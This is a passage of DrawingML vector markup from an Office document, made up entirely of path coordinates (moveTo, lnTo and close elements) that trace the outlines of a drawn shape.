                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="601487" y="627636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="615594" y="492278"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="621806" y="411592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="625758" y="326341"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="626328" y="239258"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="624022" y="207057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="617660" y="176395"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613663" y="164885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613663" y="235954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613085" y="325883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="609156" y="410584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="602974" y="491039"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="592277" y="596854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="585546" y="651826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="584220" y="660656"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="583300" y="105990"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="583300" y="126814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583567" y="127358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583939" y="127850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583939" y="128118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="595650" y="152036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="595965" y="152573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596093" y="152942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596258" y="153279"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596258" y="153417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605543" y="180164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605543" y="180425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="611522" y="209219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="611522" y="209955"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613663" y="239911"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613663" y="164885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="607819" y="148053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605543" y="143404"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605543" y="180164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605408" y="179676"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="605408" y="143129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596258" y="124439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596258" y="153279"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596093" y="152881"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="596093" y="124102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="594425" y="120695"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583939" y="106834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583939" y="127850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583567" y="127246"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583567" y="106342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583300" y="105990"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="576021" y="716273"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="576021" y="718013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="588559" y="718772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="588559" y="717031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="577659" y="716372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576021" y="716273"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="576021" y="716273"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="588559" y="717031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="584220" y="660656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="582151" y="674424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="579935" y="692157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="577659" y="705296"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576585" y="713356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576021" y="716273"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="519648" y="220968"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="534030" y="260220"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="534030" y="260439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="542818" y="298870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="542818" y="299142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="547213" y="333248"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="548312" y="346984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="548866" y="356935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="548866" y="366590"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576021" y="719373"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576021" y="716273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576585" y="713356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="577659" y="705296"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="579935" y="692157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="582151" y="674424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="584220" y="660656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="561531" y="365862"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="561531" y="356409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="560952" y="346019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="559810" y="331709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="555243" y="296347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="546071" y="256240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="534030" y="223368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="534030" y="260220"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="533896" y="259765"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="533896" y="223003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="531025" y="215165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="520072" y="198882"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="520072" y="221599"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519648" y="220968"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="549453" y="82265"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="583567" y="127358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583300" y="126814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="583300" y="105990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="558669" y="73433"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="550045" y="66357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="550045" y="82750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="549453" y="82265"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="549008" y="81677"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="549453" y="82265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="550045" y="82750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="549008" y="81677"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="549008" y="65506"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="549008" y="81677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="550045" y="82750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="550045" y="66357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="549008" y="65506"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="506711" y="47199"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="549453" y="82265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="549008" y="81677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="549008" y="65506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="513552" y="36412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507392" y="33474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507392" y="47524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507114" y="47346"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506711" y="47199"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="519381" y="220241"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="519648" y="220968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="520072" y="221599"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519381" y="220241"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="519381" y="197854"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="519381" y="220241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="520072" y="221599"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="520072" y="198882"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519381" y="197854"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="496973" y="169870"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="496973" y="187251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497350" y="187812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497837" y="188280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497837" y="188536"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519648" y="220968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519381" y="220241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519381" y="197854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507114" y="179616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497837" y="170700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497837" y="188280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497350" y="187700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497350" y="170232"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="496973" y="169870"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="506100" y="32858"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="506100" y="46698"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506711" y="47088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507114" y="47391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507392" y="47524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="507392" y="33474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506100" y="32858"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="214487" y="79828"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="214487" y="98487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214854" y="98091"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215148" y="97638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215148" y="97773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234785" y="76578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="241921" y="68763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="264877" y="50677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287451" y="37402"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="290095" y="35812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317386" y="24046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317851" y="23724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="344406" y="17123"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346472" y="16592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="373913" y="12792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="404081" y="12799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="15992"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="430185" y="16442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="451759" y="22133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="456687" y="23349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457082" y="23537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457791" y="23724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457791" y="23875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506711" y="47199"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506100" y="46698"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="506100" y="32858"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461615" y="11637"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457791" y="10621"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457791" y="23724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457082" y="23483"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="457082" y="10432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="433069" y="4054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="404081" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="373913" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="11561"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="258087" y="39941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215148" y="79114"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215148" y="97638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214854" y="98016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214854" y="79432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214487" y="79828"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="483189" y="159513"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="483189" y="174203"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483700" y="174694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484271" y="175044"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484271" y="175242"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="497350" y="187812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="496973" y="187251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="496973" y="169870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="491482" y="164593"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484271" y="160176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484271" y="175044"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483700" y="174600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483700" y="159827"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483189" y="159513"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="466805" y="151107"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="466805" y="164345"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="467373" y="164693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468067" y="164931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468067" y="165118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483700" y="174694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483189" y="174203"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483189" y="159513"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="472837" y="153173"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468067" y="151539"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468067" y="164931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="467373" y="164608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="467373" y="151301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="466805" y="151107"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="448349" y="145618"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="448349" y="158174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449064" y="158419"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449783" y="158489"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449783" y="158665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="467373" y="164693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="466805" y="164345"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="466805" y="151107"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="451759" y="145951"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449783" y="145758"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449783" y="158489"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449064" y="158331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449064" y="145688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448349" y="145618"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="0" y="530996"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="59832" y="596824"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113993" y="653778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157998" y="698885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="221665" y="762513"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234033" y="750160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="243491" y="741262"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363471" y="626412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="400708" y="591456"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="431109" y="561627"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="443000" y="550313"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="462328" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="447019" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="447019" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="431594" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="422335" y="552483"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391979" y="582266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="354773" y="617192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234785" y="732047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226146" y="740178"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226146" y="749076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="217184" y="749076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="217184" y="740119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="167042" y="690003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123165" y="645024"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69184" y="588265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28712" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14332" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14332" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="530996"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="426684" y="143616"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="156237"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428202" y="156199"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428202" y="156385"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448349" y="158349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="449064" y="158419"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448349" y="158174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448349" y="145618"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428202" y="143650"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428202" y="156199"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427430" y="156218"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427430" y="143575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="143616"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="431594" y="543669"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447019" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442542" y="532850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434196" y="541191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="431594" y="543669"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="301521" y="269492"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="301521" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="431594" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434196" y="541191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442542" y="532850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="447019" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="447019" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="537407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307981" y="531116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307981" y="233672"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="303293" y="254724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="301521" y="269492"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="388764" y="149035"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="388764" y="161830"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="390567" y="161289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="390567" y="161573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="156416"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427157" y="156348"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="156237"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="426684" y="143616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="390567" y="148778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="390567" y="161289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="389705" y="161696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="389705" y="148901"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="388764" y="149035"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="388764" y="161830"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="389705" y="161696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="390567" y="161289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="388764" y="161830"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="361678" y="174909"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="389705" y="161696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="388764" y="161830"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="388764" y="149035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386022" y="149427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362427" y="160550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362427" y="174180"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="361678" y="174909"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="360707" y="175366"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="361678" y="174909"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362427" y="174180"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="360707" y="175366"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="360707" y="161361"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="360707" y="175366"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362427" y="174180"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362427" y="160550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="360707" y="161361"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="342123" y="193925"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="361678" y="174909"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="360707" y="175366"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="360707" y="161361"/>
                                </a:lnTo>
